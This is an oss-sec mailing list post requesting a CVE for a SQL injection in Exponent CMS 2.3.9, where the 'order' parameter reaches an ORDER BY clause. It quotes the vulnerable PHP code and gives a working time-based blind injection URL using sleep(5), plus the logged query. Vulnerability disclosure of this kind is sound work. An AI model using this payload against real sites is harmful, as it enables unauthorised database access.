oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request - Exponent CMS 2.3.9 SQL injection

From: 王禹哲 <0xtom4to () gmail com>
Date: Mon, 19 Sep 2016 08:17:53 -0400
Author: Tomato jianing.wang () chaitin com

Data: 2016–09–19

Version: 2.3.9 and earlier

/exponent–2.3.9/framework/core/subsystems/expPaginator.php


if (strstr($this->order," ")) {
            $orderby = explode(" ",$this->order);
            $this->order = $orderby[0];
            $this->order_direction = $orderby[1];
        }
        if ($this->dontsort)
            $sort = null;
        else
            $sort = $this->order.' '.$this->order_direction;

        // figure out how many records we're dealing with & grab the records
        //if (!empty($this->records)) { //from Merge <~~ this doesn't
work. Could be empty, but still need to hit.
        if (!empty($this->categorize))
            $limit = null;
        else
            $limit = $this->limit;

        if (isset($params['records'])) { // if we pass
$params['records'], we WANT to hit this
            // sort the records that were passed in to us
            if (!empty($sort))
                usort($this->records,array('expPaginator',
strtolower($this->order_direction)));
//          $this->total_records = count($this->records);
        } elseif (!empty($class)) { //where clause     //FJD: was
$this->class, but wasn't working...
            $this->total_records = $class->find('count', $this->where);
            $this->records = $class->find('all', $this->where, $sort,
$limit, $this->start);
        } elseif (!empty($this->where)) { //from Merge....where clause
            $this->total_records = $class->find('count', $this->where);
            $this->records = $class->find('all', $this->where, $sort,
$limit, $this->start);
        } else { //sql clause  //FIXME we don't get attachments in this approach
            //$records = $db->selectObjectsBySql($this->sql);
            //$this->total_records = count($records);
            //this is MUCH faster if you supply a proper count_sql
param using a COUNT() function; if not,
            //we'll run the standard sql and do a queryRows with it
            //$this->total_records = $this->count_sql == '' ?
$db->queryRows($this->sql) : $db->selectValueBySql($this->count_sql);
//From Merge

//          $this->total_records =
$db->countObjectsBySql($this->count_sql);
//$db->queryRows($this->sql); //From most current Trunk

            if (!empty($sort)) $this->sql .= ' ORDER BY '.$sort;


i can controller $order ,i can use this parameter to sql injection

such as

exponent–2.3.9/framework/modules/company/controllers/companyController.php


function showall() {
        expHistory::set('viewable', $this->params);
        $page = new expPaginator(array(
            'model'=>$this->basemodel_name,
            'where'=>1,
            'limit'=>(isset($this->params['limit']) &&
$this->config['limit'] != '') ? $this->params['limit'] : 10,
            'order'=>isset($this->params['order']) ?
$this->params['order'] : 'rank',
            'page'=>(isset($this->params['page']) ? $this->params['page'] : 1),
            'controller'=>$this->baseclassname,
            'action'=>$this->params['action'],
            'columns'=>array(
                gt('Manufacturer')=>'title',
                gt('Website')=>'website'
            ),
        ));

        assign_to_template(array(
            'page'=>$page,
            'items'=>$page->records
        ));
    }


the poc is

http://127.0.0.1/exponent-2.3.9/index.php?controller=company&action=showall&limit=1&order=(select/**/*/**/from/**/(select/**/sleep(5))x)%23

in the mysql log we can see this

SELECT * FROM exponent_companies WHERE 1 ORDER BY
(select/**/*/*/from/*/(select/**/sleep(5))x)#
ASC LIMIT 0,10

Could you assign CVE id for this?

Regards,

Tomato
Previous By Date Next
Previous By Thread Next

Current thread: